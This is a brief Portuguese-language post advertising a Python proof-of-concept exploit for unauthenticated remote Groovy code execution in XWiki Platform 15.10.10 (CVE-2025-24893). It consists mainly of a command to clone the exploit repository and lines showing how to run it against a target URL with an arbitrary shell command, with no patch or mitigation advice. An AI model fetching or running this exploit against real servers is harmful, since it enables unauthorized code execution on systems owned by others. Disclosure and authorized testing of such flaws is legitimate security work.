
PoC | XWiki Platform 15.10.10 - Execução Remota de Código
Uma vulnerabilidade da categoria RCE (Execução Remota de Código), encontrada quando atacantes não autenticados podem executar código Groovy arbitrário remotamente sem autenticação nem acesso prévio (Usuário Convidado). A seguir, um PoC (Proof-Of-Concept) em Python para a exploração desta vulnerabilidade.
git clone https://github.com/zs1n/CVE-2025-24893
python3 CVE-2025-24893.py -u <url> -c <command>
python3 CVE-2025-24893.py -u https://domain.com -c 'id'